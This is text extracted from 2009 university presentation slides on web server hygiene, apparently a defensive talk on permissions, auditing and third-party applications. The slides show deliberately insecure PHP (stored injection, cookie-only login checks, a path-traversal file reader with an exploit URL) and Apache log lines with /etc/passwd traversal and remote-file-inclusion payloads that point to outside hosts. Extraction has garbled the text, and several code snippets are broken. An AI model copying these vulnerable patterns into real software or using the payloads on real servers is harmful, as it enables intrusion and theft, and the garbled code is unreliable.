Mar 12, 2009 ... W b H i eb Hygiene. Best practices for maintaining a. Best practices for
maintaining a secure web server when you have user maintained sites.
W b Hygiene Web H i Best practices for maintaining a secure web server when you have user maintained sites March 12, 2009 Presented by: Debbie Gillespie Email:
[email protected] deb@cs umn edu
Why am I here?
Overview • What problems can be found on your web server – – – –
Bad permissions Files that don’t belong Unpatched applications Bad scripts
• Ways W to t improve i security it on your server – Keep user maintained sites separate from departmental sites – Audit server frequently – 3rd Partyy applications pp
Problems that I have found on our servers
World Writable Permissions / Apache Writable Permissions • Di Directories t i • Files • .htaccess & .htpasswd files
Files that were never meant to be published on the web • G Grades d • Homework submissions • Other files that are not “private,” but y are not meant to be shared with they everyone either • Users often use their web space to collaborate with others
3rd Party Web applications • I have h never ffound d a 3rd party t web b application that has been patched by th user who the h iinstalled t ll d it
Bad Scripts • C Code d th thatt allows ll users tto upload files or text • Code that grants access to system commands • Authentication that is just plain broken
Code that allows users to post text ###### File that accepts registrations (input.php) ####### $record = $_POST["name1"] . " and “ . $_POST["name2"] . " registered for “ . $_POST["time"] _ [ ] . " at slot “ . $_POST["order"]; _ [ ] $reg_slot = $_POST["time"] . "_“ . $_POST["order"]; $file_name = "record.dat“; $file pointer = fopen($file_name, $file_pointer fopen($file name "a"); a ); $reg_file = fopen("registered.dat", "a"); fwrite($reg_file, $reg_slot."\n"); // add user supplied data to file that is web accessible fwrite($file_pointer, $record."\n"); ######## File to Display contents of Registration (see_reg.php) ############ $reg_list=file("record.dat"); foreach($reg_list as $reg_elem) { echo $reg_elem . "\n
"; }
Bad Authentication Code - 1 #### login.php ###### $login = trim($_POST["login"]); // login stores the username $password = trim($_POST["password"]); if(strlen($login)==0 or strlen($password)==0) header('Location: index.html'); $filename = 'secret.txt'; $fp = fopen( $filename, 'r' ); $lines = explode("\n", @fread( $fp, filesize( $filename ) );); $test = 0; for ($i = 0; $i < count($lines); $i++) { $line = explode("|", $lines[$i]); if(!strcmp($login,trim($line[0])) && !strcmp($password,trim($line[1]))) $test = 1; } if($test) { setcookie(key, $login, 2592000 + time()); header('Location: header( Location: ./list.php /list php'); ); } else { header('Location: index.html'); }
Bad Authentication Code - 2 ##### Code to check whether user is logged in (check.php) ###### if(!isset($_COOKIE['key'])) { header('Location: ./index.html'); }
Code that allows you to read files on server #### Script to read files stored in comments dir (readcomments.php) ##### $filename = "comments/“ . $_GET["id"] . ".txt"; $fp = fopen( $filename, 'r' ); $ $file_contents = @fread( $fp, $ filesize( $filename $ ) ); $lines = explode("\n", $file_contents); $numlines = count($lines); for ($i = 0; $i < $numlines; $i++) { if(strlen($lines[$i])==0) continue; $comments = explode("|", $lines[$i]); echo "
| User: | “ . $comments[0] . " |
"; echo "
| Comments: | “ . $comments[1] . " |
"; } ### Easy Expoit ### readcomments.php?id=../secret
What to do to improve web server “Hygiene”
Ways to minimize damage and prevent security breaches
Keep departmental sites separate from user developed sites
Putt your user maintained P i t i d sites it on an apache process that does NOT host departmental sites
Make sure your apache users h have minimal i i l access
Use SuExec for CGI scripts p
Audit Server Frequently • L Look k ffor bad b d permissions i i • Look for bad scripts • Look for files that don’t belong on web server • Remove sites that don’t belong • Watch logs
Look for bad permissions
• find . –type type d –perm perm –o=w o=w –exec exec ls –lad lad {} \; • find . –type f –perm –o=w –exec ls –lad {} \;
Look for bad scripts • Di Directories t i and d fil files th thatt can b be written itt to by apache are often symptomatic of a d dangerous script i t
Look for files that don’t belong on a web server
Take out the trash • Remove sites that are no longer needed
Watch yyour logs g
AWStats – Links from external pages
AWStats – Search Keyphrases
Example p of suspect p Apache p log g entries 194.0.252.2 - - [10/Jan/2009:20:14:18 -0600] "GET /help/web/phptut.php/display.php?page=&lang=../../../../../../../../../../../../../etc/passwd% 00 HTTP/1 HTTP/1.1 1" 200 13745 "-" "libwww libwww-perl/5.810 perl/5 810" 2454 80 9416 www.cs.umn.edu 66.132.137.128 66 132 137 128 - - [14/Jan/2009:09:53:58 -0600] 0600] "GET GET /help/web/php /help/web/phptut.php/?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 13734 "-" "libwww-perl/5.65" 17851 80 14548 www.cs.umn.edu 63.247.65.114 - - [17/Jan/2009:10:59:04 -0600] "GET /help/web/phptut.php//index.php?_REQUEST=&_REQUEST[option]=com_content&_ REQUEST[Itemid]=1&GLOBALS=&mosConfig absolute path=http://w REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://w ww.kmt-s.ru/chid.txt??? HTTP/1.1" 200 13744 "-" "libwww-perl/5.810" 14215 80 9961 www.cs.umn.edu
Don’t allow users to install rd their own 3 party applications
But, encourage users to use But 3rd party applications • • • • • •
UMWiki (https://wiki.umn.edu/) ( p ) UThink (http://blog.lib.umn.edu/) WebVista (http://webct.umn.edu/) (http://webct umn edu/) Moodle (https://moodle.umn.edu/) UMContent (http://1help.umn.edu/umcontent/) Netfiles (http://www1.umn.edu/netfiles/about.html)
P t h Installed Patch I t ll d A Applications li ti • Sign up for mailing lists to receive notifications of new releases and security alerts
Additional Resources • OWASP - The Open Web Application Security Project (http://www.owasp.org/) (http://www owasp org/) • The OWASP Guide to Building Secure Web Applications (http://www.owasp.org/index.php/Category:OWASP_ Guide_Project)
• 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (http://cwe.mitre.org/top25/)
Questions?
